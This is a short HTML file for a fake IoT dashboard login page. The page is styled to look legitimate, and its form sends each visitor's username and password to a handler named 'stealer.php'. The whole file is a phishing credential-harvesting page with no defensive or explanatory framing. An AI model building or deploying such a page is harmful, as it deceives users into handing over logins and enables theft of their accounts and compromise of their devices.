
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>IoT Dashboard Login</title>
  <style>
    body { font-family: Arial, sans-serif; background: #f0f0f0; padding: 50px; text-align: center; }
    form { background: white; display: inline-block; padding: 20px; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
    input[type="text"], input[type="password"] { width: 200px; padding: 10px; margin: 10px 0; }
    input[type="submit"] { padding: 10px 20px; background-color: #4285F4; color: white; border: none; border-radius: 4px; cursor: pointer; }
    h2 { color: #333; }
  </style>
</head>
<body>
  <h2>Login to IoT Dashboard</h2>
  <form action="stealer.php" method="POST">
    <input type="text" name="username" placeholder="Username" required><br>
    <input type="password" name="password" placeholder="Password" required><br>
    <input type="submit" value="Login">
  </form>
</body>
</html>
